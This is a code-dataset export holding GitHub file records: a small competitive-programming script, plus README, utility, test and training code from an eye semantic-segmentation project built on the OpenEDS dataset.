[ { "alpha_fraction": 0.4632478654384613, "alphanum_fraction": 0.48547008633613586, "avg_line_length": 16.08823585510254, "blob_id": "3a49c749ad4a8c8770b98c078abed516a4467c22", "content_id": "3e7489345ea225e16e02880839733e4e64634cd4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 585, "license_type": "no_license", "max_line_length": 53, "num_lines": 34, "path": "/win_or_lose.py", "repo_name": "maheshkumarmadire/TechGig-Challenges", "src_encoding": "UTF-8", "text": "\n# coding: utf-8\n\n# In[19]:\n\nimport numpy as np;\nt = int(input())\nwhile t > 0:\n N = int(input()) # take single Integer input\n arr_v=input() # takes the whole line of n numbers\n arr_p=input() # takes the whole line of n numbers\n V = list(map(int,arr_v.split(' ')))\n P = list(map(int,arr_p.split(' ')))\n V.sort(reverse=True)\n P.sort(reverse=True)\n i=0\n win=0\n while i < N:\n if P[i] <= V[i]:\n win=1\n i=i+1\n if win==1 :\n print(\"LOSE\")\n else :\n print(\"WIN\")\n \n t=t-1\n\n\n# In[14]:\n\nP[0]\n\n\n# In[ ]:\n\n\n\n" }, { "alpha_fraction": 0.8095238208770752, "alphanum_fraction": 0.8095238208770752, "avg_line_length": 20, "blob_id": "895c84064040f7505e448512efb006f4150d2740", "content_id": "8e203afe193c9adb39beeaaf107af71a0e76dee1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 21, "license_type": "no_license", "max_line_length": 20, "num_lines": 1, "path": "/README.md", "repo_name": "maheshkumarmadire/TechGig-Challenges", "src_encoding": "UTF-8", "text": "# TechGig-Challenges\n" } ]
2
ZhiminWang96/Eye_VR_Segmentation
https://github.com/ZhiminWang96/Eye_VR_Segmentation
1574227005e956e20538a7fd58bceda01ff8ea4a
43ea78c1c7da12a16a54c987e3c5793b0c0da4e2
f0355cc448bcab863bd7f8898ecfc020098db61c
refs/heads/master
2023-06-11T07:14:59.559648
2021-06-16T06:13:30
2021-06-16T06:13:30
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5837163329124451, "alphanum_fraction": 0.6861457824707031, "avg_line_length": 51.517242431640625, "blob_id": "eb21aab15c48b55ec0f300636ffe41dfba842781", "content_id": "97dffaa224abf0af10ba476d6ff23480ad867eb9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1523, "license_type": "no_license", "max_line_length": 288, "num_lines": 29, "path": "/README.md", "repo_name": "ZhiminWang96/Eye_VR_Segmentation", "src_encoding": "UTF-8", "text": "## Eye Semantic Segmentation with a Lightweight Model\nAR/VR Eye Semantic Segmentation with Open Eye Dataset [1] in OpenEDS Semantic Segmentation Challenge 2019.\n- Best mIoU: **0.9491**\n- Number of trainable parameters: **104728**\n\n\nV. T. Huynh, S. Kim, G. Lee and H. Yang, \"Eye Semantic Segmentation with A Lightweight Model,\" *2019 IEEE/CVF International Conference on Computer Vision Workshop (ICCVW)*, Seoul, Korea (South), 2019, pp. 3694-3697, doi: [10.1109/ICCVW.2019.00457](https://ieeexplore.ieee.org/document/9022251).\n```\n@INPROCEEDINGS{9022251, \n author={V. T. {Huynh} and S. {Kim} and G. {Lee} and H. {Yang}}, \n booktitle={2019 IEEE/CVF International Conference on Computer Vision Workshop (ICCVW)}, \n title={Eye Semantic Segmentation with A Lightweight Model}, \n year={2019}, \n pages={3694-3697},\n}\n```\n\nV. T. Huynh, H. Yang, G. Lee and S. Kim, \"Semantic Segmentation of the Eye With a Lightweight Deep Network and Shape Correction,\" in *IEEE Access*, vol. 8, pp. 131967-131974, 2020, doi: [10.1109/ACCESS.2020.3010011](https://ieeexplore.ieee.org/document/9143078).\n```\n@ARTICLE{9143078, \n author={V. T. {Huynh} and H. {Yang} and G. {Lee} and S. {Kim}}, \n journal={IEEE Access}, \n title={Semantic Segmentation of the Eye With a Lightweight Deep Network and Shape Correction}, \n year={2020}, \n volume={8}, \n pages={131967-131974},\n}\n```\n[1] Garbin, Stephan J., Yiru Shen, Immo Schuetz, Robert Cavin, Gregory Hughes, and Sachin S. Talathi. 
\"OpenEDS: Open Eye Dataset.\" arXiv preprint arXiv:1905.03702 (2019).\n" }, { "alpha_fraction": 0.5734816789627075, "alphanum_fraction": 0.5859063267707825, "avg_line_length": 29.902578353881836, "blob_id": "08182e1b0adf410fcb41960d8885a5cf54e7a354", "content_id": "c8ae7949988dae259ffd21d8869d39ff3b9837e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10785, "license_type": "no_license", "max_line_length": 112, "num_lines": 349, "path": "/src/utils.py", "repo_name": "ZhiminWang96/Eye_VR_Segmentation", "src_encoding": "UTF-8", "text": "import glob\nimport os\n\nimport cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nimport torchsummary\nfrom PIL import Image\nfrom skimage import measure\nfrom torch.utils import data\nfrom torchvision import transforms\nfrom tqdm import tqdm\n\n\n# __all__ = ['OpenEDS']\n\n\nclass ToTensor(object):\n \"\"\" Convert ndarrays in sample to Tensors\"\"\"\n\n def __call__(self, sample):\n img, mask, name = np.asarray(sample['image']), sample['mask'], sample['name']\n\n # swap color axis because\n # numpy image: H x W x C\n # torch image: C X H X W\n # img is gray scale image\n img = img[np.newaxis, :] / 255.0\n # img = img.transpose((2, 0, 1)) / 255.0\n return {'image': torch.from_numpy(img).type(torch.FloatTensor),\n 'mask': torch.from_numpy(mask).type(torch.LongTensor), 'name': name}\n\n\nclass Rescale(object):\n \"\"\" Rescale the image in a sample to a given size \"\"\"\n\n def __init__(self, output_size):\n assert isinstance(output_size, (int, float, tuple))\n self.output_size = output_size\n\n def __call__(self, sample):\n img, mask, name = sample['image'], sample['mask'], sample['name']\n w, h = img.size # PIL image, size return w, h\n if isinstance(self.output_size, int):\n if h > w:\n new_h, new_w = self.output_size * h / w, self.output_size\n else:\n new_h, new_w = self.output_size, self.output_size * w / h\n elif isinstance(self.output_size, float):\n new_h, new_w = self.output_size * h, self.output_size * w\n else:\n new_h, new_w = self.output_size\n\n new_h = int(new_h)\n new_w = int(new_w)\n img = transforms.Resize((new_h, new_w))(img)\n\n return {'image': img, 'mask': mask, 'name': name}\n\n\nclass Brightness(object):\n \"\"\" Rescale the image in a sample to a given size \"\"\"\n\n def __init__(self, brightness):\n self.brightness = brightness\n\n def __call__(self, sample):\n img, mask, name = sample['image'], sample['mask'], sample['name']\n\n img = transforms.ColorJitter(brightness=self.brightness)(img)\n\n return {'image': img, 'mask': mask, 'name': name}\n\n\nclass Normalize(object):\n def __init__(self, mean, std):\n self.mean = mean\n self.std = std\n\n def __call__(self, sample):\n img, mask, name = sample['image'], sample['mask'], sample['name']\n img = transforms.Normalize(mean=self.mean, std=self.std)(img)\n return {'image': img, 'mask': mask, 'name': name}\n\n\nclass OpenEDS(data.Dataset):\n def __init__(self, root_path, transform=None):\n \"\"\" Initialization \"\"\"\n self.list_png = sorted(glob.glob(root_path + '/images/*.png'))\n self.transform = transform\n\n def __len__(self):\n \"\"\" Denotes the toal number of samples \"\"\"\n return len(self.list_png)\n\n @staticmethod\n def adjust_gamma(image, gamma=1.0):\n # build a lookup table mapping the pixel values [0, 255] to\n # their adjusted gamma values\n invGamma = 1.0 / gamma\n table = np.array([((i / 255.0) ** invGamma) * 255\n for i in np.arange(0, 
256)]).astype(\"uint8\")\n\n # apply gamma correction using the lookup table\n return cv2.LUT(image, table)\n\n def __getitem__(self, index):\n img_path = self.list_png[index]\n npy_path = img_path.replace('images', 'labels').replace('png', 'npy')\n\n # img = cv2.imread(img_path)\n # img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n # img = Image.fromarray(img)\n # img = io.imread(img_path, as_gray=True)\n # img = Image.open(img_path.replace('png', 'bmp')).convert('L')\n img = Image.open(img_path)#.convert('L') # Original images\n if img.mode == 'RGB':\n img = img.convert('L')\n\n if 'test' in img_path:\n npy = np.array([])\n else:\n npy = np.load(npy_path, allow_pickle=False)\n\n img_name = img_path.replace('\\\\', '/').split('/')[-1][:-4]\n sample = {'image': img, 'mask': npy, 'name': img_name}\n if self.transform:\n sample = self.transform(sample)\n\n return sample\n\n\n\"\"\" Define metrics \"\"\"\n\n\ndef pixel_acc(pred, label):\n acc = torch.eq(pred, label).type(torch.FloatTensor).mean()\n return acc\n\n\ndef mean_iou(pred, label, num_classes=4):\n \"\"\"\n Mean IoU\n :param pred:\n :param label:\n :param num_classes:\n :return:\n \"\"\"\n accum = False\n iou = None\n for idx in range(num_classes):\n out1 = (pred == idx)\n out2 = (label == idx)\n\n intersect = torch.sum(out1 & out2, dim=(1, 2)).type(torch.FloatTensor)\n union = torch.sum(out1 | out2, dim=(1, 2)).type(torch.FloatTensor)\n if accum:\n iou = iou + torch.div(intersect, union + 1e-16)\n else:\n iou = torch.div(intersect, union + 1e-16)\n accum = True\n m_iou = torch.mean(iou) / num_classes\n return m_iou\n\n\ndef adjust_learning_rate(optimizer, lr):\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr\n return lr\n\n\ndef save_checkpoint(dir, epoch, **kwargs):\n state = {\n 'epoch': epoch,\n }\n state.update(kwargs)\n filepath = os.path.join(dir, 'checkpoint-%d.pt' % epoch)\n torch.save(state, filepath)\n\n\ndef visualize(pred, label, idx=None):\n fig = plt.figure()\n ax1 = fig.add_subplot(121)\n ax1.imshow(pred)\n ax1.set_title('Predicted')\n\n ax2 = fig.add_subplot(122)\n ax2.imshow(label)\n ax2.set_title('Ground truth')\n\n if idx is not None:\n os.makedirs('./viz/', exist_ok=True)\n plt.savefig('./viz/{}.png'.format(idx))\n plt.clf()\n plt.close()\n del fig\n\n\ndef train_epoch(loader, model, criterion, optimizer, device='cuda:0'):\n loss_sum = 0.0\n eval_pixel_acc = []\n eval_mean_iou = []\n\n model.train()\n\n for i, sample_batched in enumerate(loader):\n input = sample_batched['image'].to(device)\n target = sample_batched['mask'].to(device)\n\n optimizer.zero_grad()\n\n out_probs, out_cat = model(input)\n loss = criterion(out_probs, target, device=device)\n\n loss.backward()\n optimizer.step()\n\n loss_sum += loss.item()\n eval_pixel_acc.append(pixel_acc(out_cat, target))\n eval_mean_iou.append(mean_iou(out_cat, target))\n\n eval_pixel_acc = np.mean(eval_pixel_acc)\n eval_mean_iou = np.mean(eval_mean_iou)\n return {\n 'loss': loss_sum,\n 'accuracy': eval_pixel_acc,\n 'mIOU': eval_mean_iou\n }\n\n\ndef eval(loader, model, criterion, device='cuda:0', viz=None):\n loss_sum = 0.0\n eval_pixel_acc = []\n eval_mean_iou = []\n\n model.eval()\n\n for i, sample_batched in enumerate(loader):\n input = sample_batched['image'].to(device)\n target = sample_batched['mask'].to(device)\n\n out_probs, out_cat = model(input)\n loss = criterion(out_probs, target, device=device)\n\n loss_sum += loss.item()\n eval_pixel_acc.append(pixel_acc(out_cat, target))\n eval_mean_iou.append(mean_iou(out_cat, target))\n\n # if viz is 
not None:\n # visualize(out_cat[1 + len(sample_batched) // 2].cpu().numpy(),\n # target[1 + len(sample_batched) // 2].cpu().numpy(), viz)\n # viz = None\n\n eval_mean_iou = np.mean(eval_mean_iou)\n eval_pixel_acc = np.mean(eval_pixel_acc)\n\n return {\n 'loss': loss_sum,\n 'accuracy': eval_pixel_acc,\n 'mIOU': eval_mean_iou\n }\n\n\ndef weighted_CrossEntropyLoss(output, target, device, n_classes=4):\n \"\"\" Weighted Cross Entropy Loss\"\"\"\n n_pixel = target.numel()\n _, counts = torch.unique(target, return_counts=True)\n cls_weight = torch.div(n_pixel, n_classes * counts.type(torch.FloatTensor)).to(device)\n loss = F.cross_entropy(output, target, weight=cls_weight)\n\n return loss\n\n\ndef generalised_dice_loss_ce(output, target, device, n_classes=4, type_weight='simple', add_crossentropy=False):\n n_pixel = target.numel()\n _, counts = torch.unique(target, return_counts=True)\n cls_weight = torch.div(n_pixel, n_classes * counts.type(torch.FloatTensor)).to(device)\n\n if type_weight == 'square':\n cls_weight = torch.pow(cls_weight, 2.0)\n\n if add_crossentropy:\n loss_entropy = F.nll_loss(torch.log(output), target, weight=cls_weight)\n\n if len(target.size()) == 3:\n # Convert to one hot encoding\n encoded_target = F.one_hot(target.to(torch.int64), num_classes=n_classes)\n encoded_target = encoded_target.permute(0, 3, 1, 2).to(torch.float)\n else:\n encoded_target = target.clone().to(torch.float)\n # print(output.size(), encoded_target.size(), target.size(), len)\n assert output.size() == encoded_target.size()\n\n intersect = torch.sum(torch.mul(encoded_target, output), dim=(2, 3))\n union = torch.sum(output, dim=(2, 3)) + torch.sum(encoded_target, dim=(2, 3))\n union[union < 1] = 1\n\n gdl_numerator = torch.sum(torch.mul(cls_weight, intersect), dim=1)\n gdl_denominator = torch.sum(torch.mul(cls_weight, union), dim=1)\n generalised_dice_score = torch.sub(1.0, 2 * gdl_numerator / gdl_denominator)\n\n if add_crossentropy:\n loss = 0.5 * torch.mean(generalised_dice_score) + 0.5 * loss_entropy\n else:\n loss = torch.mean(generalised_dice_score)\n\n return loss\n\n\ndef test_writer(model, device, test_loader, write_folder='./test/predicts/'):\n \"\"\" Run on test loader \"\"\"\n print('Write test results')\n model.eval()\n for i, sample_batched in enumerate(tqdm(test_loader)):\n input = sample_batched['image'].to(device)\n # target = sample_batched['mask'].to(device)\n\n out_probs, out_cat = model(input)\n\n img_names = sample_batched['name']\n img_mask_predict = out_cat.cpu().numpy().astype(np.uint8)\n for idx in range(img_mask_predict.shape[0]):\n cur_predict = img_mask_predict[idx, :, :]\n cur_name = img_names[idx]\n\n fig = plt.figure()\n ax1 = fig.add_subplot(131)\n ax1.imshow(cur_predict)\n ax1.set_title('Predicted')\n\n cur_predict_ref = eye_refinement(cur_predict)\n np.save(write_folder + cur_name, cur_predict_ref)\n ax2 = fig.add_subplot(132)\n ax2.imshow(cur_predict_ref)\n ax2.set_title('Refine Predicted')\n\n ax3 = fig.add_subplot(133)\n ax3.imshow(input.cpu().numpy()[idx, 0, :, :], cmap='gray')\n ax3.set_title('Image')\n\n plt.savefig('{}{}{}.png'.format(write_folder, 'imgs/', cur_name))\n plt.clf()\n plt.close()\n del fig\n\n model.train()\n torchsummary.summary(model, (1, 320, 200))\n" }, { "alpha_fraction": 0.5072174072265625, "alphanum_fraction": 0.5370158553123474, "avg_line_length": 40.280235290527344, "blob_id": "f66f0736eabc0337572df2bbe50f630e8e309887", "content_id": "41288d0d03f34ac66ef75d2d65f1db184e150ed9", "detected_licenses": [], "is_generated": false, "is_vendor": 
false, "language": "Python", "length_bytes": 13994, "license_type": "no_license", "max_line_length": 146, "num_lines": 339, "path": "/src/test.py", "repo_name": "ZhiminWang96/Eye_VR_Segmentation", "src_encoding": "UTF-8", "text": "import argparse\nimport gc\nimport os\nimport sys\n\nimport cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport torch\nimport torchsummary\nfrom scipy import signal\nfrom scipy.interpolate import interp1d\nfrom scipy.spatial import ConvexHull\nfrom skimage import measure\nfrom torchvision import transforms\nfrom tqdm import tqdm\n\nimport utils\nfrom train import MobileNetV2_CS\nfrom utils import OpenEDS, Rescale, ToTensor, Normalize\n\n\ndef eye_refinement(img, img_name=None):\n \"\"\"\n Eye Refinement\n :param img:\n :param img_name:\n :return:\n \"\"\"\n\n def re_label(img, value, ipf=None):\n \"\"\"\n Re-label img with value (0, 1, 2)\n :param img:\n :param value:\n :param ipf:\n :return:\n \"\"\"\n\n def fill_holes(img, expr=lambda x: x > 0):\n img_binary = 255 * expr(img).astype(np.uint8)\n img_tmp = img_binary.copy()\n h, w = img_tmp.shape\n mask = np.zeros((h + 2, w + 2), np.uint8)\n\n cv2.floodFill(img_tmp, mask, (0, 0), 255)\n cv2.floodFill(img_tmp, mask, (0, 639), 255)\n img_fill = np.bitwise_or(img_binary, ~img_tmp)\n\n return img_fill\n\n img_filled = fill_holes(img, lambda x: x > value)\n\n # Remove small regions (not eye region)\n mask_regions, n_regions = measure.label(img_filled, connectivity=2, return_num=True)\n ld_area = -1\n idx = 0\n prev_idx = 0\n\n for props in measure.regionprops(mask_regions, img):\n idx = idx + 1\n if props.area > ld_area and (value > 0 or (value == 0 and props.max_intensity > 1)):\n ld_area = props.area\n img_filled[mask_regions == prev_idx] = 0\n prev_idx = idx\n else:\n img_filled[mask_regions == idx] = 0\n\n rf = ipf\n if value == 0:\n # Remove false region with peaks analysis\n horizontal_projection = np.sum(img_filled > 0, axis=1)\n peakind, _ = signal.find_peaks(horizontal_projection, distance=img_filled.shape[1] / 8)\n if len(peakind) >= 2:\n fp = -1\n if horizontal_projection[peakind[0]] > horizontal_projection[peakind[1]]:\n fp = peakind[0]\n sp = peakind[1]\n elif len(peakind) >= 3 and horizontal_projection[peakind[1]] > horizontal_projection[peakind[2]]:\n fp = peakind[1]\n sp = peakind[2]\n\n if fp > -1:\n clr_index = np.argmin(horizontal_projection[fp: sp]) + fp\n img_filled[clr_index:, :] = 0\n\n _, contours, _ = cv2.findContours((img_filled > 0).astype(np.uint8), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n cnt = contours[0]\n hull = cv2.convexHull(cnt, returnPoints=False, clockwise=True)\n x_index = cnt[hull[1:, 0], :, 0].flatten()\n end_index = np.argwhere(x_index[1:] < x_index[:-1])[0][0] + 1\n line_below_index = np.arange(hull[0, 0], hull[end_index, 0])\n emid = np.argwhere(hull[end_index + 1:, 0] < hull[end_index:-1, 0])[0][0] + end_index\n line_above_index = np.hstack(\n [np.arange(hull[end_index, 0], hull[emid, 0]), np.arange(hull[emid + 1, 0], hull[-1, 0]), np.arange(hull[-1, 0], hull[0, 0])])\n x_below = contours[0][line_below_index, :, 0].flatten()\n pk_below, _ = signal.find_peaks(x_below, width=img_filled.shape[1] * 1 / 20)\n\n if len(pk_below) > 0:\n cnt_refined = np.vstack(\n [contours[0][line_below_index[:pk_below[0]], :, :], contours[0][line_above_index, :, :]])\n cnt_mask = np.zeros(img_filled.shape, dtype=np.uint8)\n cv2.drawContours(cnt_mask, [cnt_refined], -1, (255), -1)\n cnt_mask[:, np.max(x_below[:pk_below[0]]):] = 0\n img_filled[(255 - cnt_mask).astype(np.bool)] = 0\n\n 
print(img_name)\n\n _, contours, _ = cv2.findContours((img_filled > value).astype(np.uint8), cv2.RETR_TREE,\n cv2.CHAIN_APPROX_SIMPLE)\n cnt = contours[0]\n hull = cv2.convexHull(cnt, returnPoints=False, clockwise=True)\n x_index = cnt[hull[1:, 0], :, 0].flatten()\n end_index = np.argwhere(x_index[1:] < x_index[:-1])[0][0] + 1\n line_below_index = np.arange(hull[0, 0], hull[end_index, 0])\n emid = np.argwhere(hull[end_index + 1:, 0] < hull[end_index:-1, 0])[0][0] + end_index\n line_above_index = np.hstack(\n [np.arange(hull[end_index, 0], hull[emid, 0]), np.arange(hull[emid + 1, 0], hull[-1, 0]), np.arange(hull[-1, 0], hull[0, 0])])\n\n y_above = contours[0][line_above_index, :, 1].flatten()\n pk_above, _ = signal.find_peaks(y_above, width=img_filled.shape[1] * 1 / 40)\n # if img_name == '000000347521':\n # print('***', img_name)\n # print(len(pk_above))\n if len(pk_above) > 0:\n print(img_name)\n x_above = contours[0][line_above_index, :, 0].flatten()\n\n vs = ConvexHull(np.asarray([x_above, y_above]).transpose()).vertices\n indices_of_upper_hull_verts = list(\n reversed(np.concatenate([vs[np.where(vs == len(x_above) - 1)[0][0]:], vs[0:1]])))\n newX = x_above[indices_of_upper_hull_verts]\n newY = y_above[indices_of_upper_hull_verts]\n x_smooth = np.arange(newX.max(), newX.min(), -1)\n f = interp1d(newX, newY, kind='quadratic')\n y_smooth = f(x_smooth)\n\n above_refined = np.vstack([contours[0][line_below_index, :, :],\n np.vstack([x_smooth, y_smooth]).T.reshape(-1, 1, 2).astype(np.int64)])\n\n above_mask = np.zeros(img_filled.shape, dtype=np.uint8)\n cv2.drawContours(above_mask, [above_refined], -1, 255, -1)\n ipf = np.logical_and(above_mask, ~(img_filled > 0))\n img_filled[ipf] = value + 1\n\n rf = ipf\n\n elif ipf is not None:\n print(img_name)\n _, ip_cnt, _ = cv2.findContours((img_filled > value).astype(np.uint8), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n if len(ip_cnt) > 0:\n (xc, yc), rc = cv2.minEnclosingCircle(ip_cnt[0])\n ip_mask = np.zeros(img_filled.shape, dtype=np.uint8)\n cv2.circle(ip_mask, (int(xc), int(yc)), int(rc), 255, -1)\n\n img_filled[np.logical_and(ip_mask > 0, ipf)] = value + 1\n\n img_filled = fill_holes(img_filled, lambda x: x > value)\n rf = img_filled > value\n\n return img_filled, rf\n\n img_filled_sclera, ripf = re_label(img, value=0, ipf=None)\n img_sclera = img.copy()\n img_sclera[img_filled_sclera == 0] = 0 # Largest region, consider as eye\n\n img_filled_iris, rpf = re_label(img_sclera, value=1, ipf=ripf)\n img_iris = img_sclera.copy()\n img_iris[img_filled_iris == 0] = 0\n\n img_filled_pupil, _ = re_label(img_iris, value=2, ipf=rpf)\n img_pupil = img_sclera.copy()\n img_pupil[img_filled_pupil] = 0\n\n img_ret = np.zeros(img.shape, dtype=np.uint8)\n img_ret[img_filled_sclera > 0] = 1\n img_ret[img_filled_iris > 0] = 2\n img_ret[img_filled_pupil > 0] = 3\n\n n_part = np.unique(img_ret)\n if n_part.size < 4:\n # print(img_name)\n if 1 not in n_part:\n if 2 in n_part:\n img_ret[img_ret == 2] = 1\n if 3 in n_part:\n img_ret[img_ret == 3] = 2\n elif 3 in n_part:\n img_ret[img_ret == 3] = 1\n else:\n if 2 not in n_part:\n if 3 in n_part:\n img_ret[img_ret == 3] = 2\n\n return img_ret\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Eye Segmentation - SGD/SWA Testing')\n # parser.add_argument('--dir', type=str, default=None, required=True, help='training directory (default: None)')\n parser.add_argument('--batch_size', type=int, default=32, metavar='N', help='input batch size (default: 128)')\n parser.add_argument('--num_workers', 
type=int, default=4, metavar='N', help='number of workers (default: 4)')\n parser.add_argument('--checkpoint', type=str, default=None, required=True, metavar='CKPT',\n help='checkpoint to resume training from (default: None)')\n parser.add_argument('--checkpoint_2', type=str, default=None, required=False, metavar='CKPT',\n help='checkpoint to resume training from (default: None)')\n\n args = parser.parse_args()\n\n print('Loading dataset.')\n root_path = './Semantic_Segmentation_Dataset/'\n write_folder = root_path + 'test/predicts/'\n os.makedirs(write_folder, exist_ok=True)\n os.makedirs(write_folder + 'imgs/', exist_ok=True)\n with open(os.path.join(write_folder, 'command.sh'), 'w') as f:\n f.write(' '.join(sys.argv))\n f.write('\\n')\n\n cfg = dict()\n cfg['batch_size'] = 64\n\n cfg['scale'] = 0.5\n if cfg['scale'] == 0.5:\n mnet_v2_mean = [0.4679]\n mnet_v2_std = [0.2699]\n else:\n mnet_v2_mean = [0.4679]\n mnet_v2_std = [0.2699]\n\n train_set = OpenEDS(root_path=root_path + 'train',\n transform=transforms.Compose(\n [Rescale(cfg['scale']), ToTensor(), Normalize(mnet_v2_mean, mnet_v2_std)])) #\n val_set = OpenEDS(root_path=root_path + 'validation',\n transform=transforms.Compose(\n [Rescale(cfg['scale']), ToTensor(), Normalize(mnet_v2_mean, mnet_v2_std)])) #\n\n test_set = OpenEDS(root_path=root_path + 'test',\n transform=transforms.Compose(\n [Rescale(cfg['scale']), ToTensor(), Normalize(mnet_v2_mean, mnet_v2_std)])) #\n\n loaders = {'train': torch.utils.data.DataLoader(train_set, batch_size=args.batch_size, shuffle=True,\n num_workers=args.num_workers),\n 'val': torch.utils.data.DataLoader(val_set, batch_size=args.batch_size, shuffle=False,\n num_workers=args.num_workers, pin_memory=False),\n 'test': torch.utils.data.DataLoader(test_set, batch_size=args.batch_size, shuffle=False,\n num_workers=args.num_workers, pin_memory=False)\n }\n\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n model = MobileNetV2_CS()\n model.to(device)\n\n print('Load model from {}'.format(args.checkpoint))\n checkpoint = torch.load(args.checkpoint)\n model.load_state_dict(checkpoint['state_dict'])\n\n model.eval()\n print('Val set: ', utils.eval(loaders['val'], model, utils.generalised_dice_loss_ce))\n torch.save(model.state_dict(), write_folder + 'model_state_dict.pt')\n torch.save(model, write_folder + 'model_full.pt')\n loader = loaders['test']\n # sys.exit(0)\n # tmp = np.load(write_folder + '000000337010.npy')\n # tmp_ref = eye_refinement(tmp)\n #\n # sys.exit(0)\n\n if args.checkpoint_2:\n model_2 = MobileNetV2_CS()\n model_2.to(device)\n checkpoint_2 = torch.load(args.checkpoint_2)\n model_2.load_state_dict(checkpoint_2['state_dict'])\n model_2.eval()\n print('Val set M2: ', utils.eval(loaders['val'], model_2, utils.generalised_dice_loss_ce))\n alpha = 0.75\n else:\n model_2 = None\n alpha = 0\n\n # print('Alpha value: ', model.alpha)\n for i, sample_batched in enumerate(tqdm(loader)):\n gc.collect()\n input = sample_batched['image'].to(device)\n target = sample_batched['mask'].to(device)\n\n out_probs, out_cat = model(input)\n if model_2:\n out_probs_2, _ = model_2(input)\n out_probs_avg = (1.0 - alpha) * out_probs + alpha * out_probs_2\n out_cat = torch.argmax(out_probs_avg, dim=1)\n\n img_names = sample_batched['name']\n img_mask_predict = out_cat.cpu().numpy().astype(np.uint8)\n for idx in range(img_mask_predict.shape[0]):\n cur_predict = img_mask_predict[idx, :, :]\n cur_name = img_names[idx]\n # np.save(write_folder + cur_name, cur_predict)\n # if cur_name == 
'000000337055':\n # print('Stop here')\n # else:\n # continue\n\n # if cur_name in ['000000337742', '000000350291', '000000353150']:\n # plt.imsave('E:/' + cur_name + '_pred.png', cur_predict)\n # cur_predict_ref = eye_refinement(cur_predict, cur_name)\n # plt.imsave('E:/' + cur_name + '_pred_ref.png', cur_predict_ref)\n # else:\n # continue\n\n fig = plt.figure()\n ax1 = fig.add_subplot(131)\n ax1.imshow(cur_predict)\n ax1.set_title('Predicted')\n\n np.save(write_folder + cur_name + '_orig', cur_predict)\n\n cur_predict_ref = eye_refinement(cur_predict, cur_name)\n np.save(write_folder + cur_name, cur_predict_ref)\n ax2 = fig.add_subplot(132)\n ax2.imshow(cur_predict_ref)\n ax2.set_title('Refine Predicted')\n\n ax3 = fig.add_subplot(133)\n ax3.imshow(input.cpu().numpy()[idx, 0, :, :], cmap='gray')\n ax3.set_title('Image')\n\n plt.savefig('{}{}{}.png'.format(write_folder, 'imgs/', cur_name))\n plt.clf()\n plt.close()\n del fig\n\n # if cur_name == '000000347521':\n # break\n #\n # if cur_name == '000000337039':\n # break\n # print('Alpha value: ', model.alpha)\n model.train()\n torchsummary.summary(model, (1, 320, 200))\n" }, { "alpha_fraction": 0.5538928508758545, "alphanum_fraction": 0.5707210302352905, "avg_line_length": 38.12083435058594, "blob_id": "c06b07a328e9d0602a9bc2d207f20288e75bf59f", "content_id": "b128257cb2c5541b13afbb093605adf65aa30c5c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 18778, "license_type": "no_license", "max_line_length": 120, "num_lines": 480, "path": "/src/train.py", "repo_name": "ZhiminWang96/Eye_VR_Segmentation", "src_encoding": "UTF-8", "text": "\"\"\"\nBased on the source code from these links\nhttps://github.com/timgaripov/swa\nhttps://github.com/izmailovpavel/contrib_swa_examples\n\"\"\"\n#from comet_ml import Experiment\nimport argparse\nimport datetime\nimport os\nimport random\nimport sys\nimport time\n\nimport numpy as np\nimport tabulate\nimport torch\nimport torch.nn.functional as F\nimport torchcontrib\nimport torchsummary\nfrom torch import nn\nfrom torchvision import transforms\nfrom tqdm import tqdm\n\nimport utils\nfrom utils import OpenEDS, Rescale, ToTensor, Normalize, Brightness\n\n\ndef _make_divisible(v, divisor, min_value=None):\n \"\"\"\n This function is taken from the original tf repo.\n It ensures that all layers have a channel number that is divisible by 8\n It can be seen here:\n https://github.com/tensorflow/models/blob/master/research/slim/nets/mobilenet/mobilenet.py\n :param v:\n :param divisor:\n :param min_value:\n :return:\n \"\"\"\n if min_value is None:\n min_value = divisor\n new_v = max(min_value, int(v + divisor / 2) // divisor * divisor)\n # Make sure that round down does not go down by more than 10%.\n if new_v < 0.9 * v:\n new_v += divisor\n return new_v\n\n\n\"\"\" ConvBNReLU\"\"\"\n\n\nclass ConvBNReLU(nn.Sequential):\n def __init__(self, in_planes, out_planes, kernel_size=3, stride=1, groups=1):\n padding = (kernel_size - 1) // 2\n super(ConvBNReLU, self).__init__(\n nn.Conv2d(in_planes, out_planes, kernel_size, stride, padding, groups=groups, bias=False),\n nn.BatchNorm2d(out_planes),\n nn.ReLU6(inplace=True)\n )\n\n\n\"\"\" ConvReLU\"\"\"\n\n\nclass ConvReLU(nn.Sequential):\n def __init__(self, in_planes, out_planes, kernel_size=3, stride=1, groups=1):\n padding = (kernel_size - 1) // 2\n super(ConvReLU, self).__init__(\n nn.Conv2d(in_planes, out_planes, kernel_size, stride, padding, groups=groups, bias=False),\n nn.BatchNorm2d(out_planes),\n 
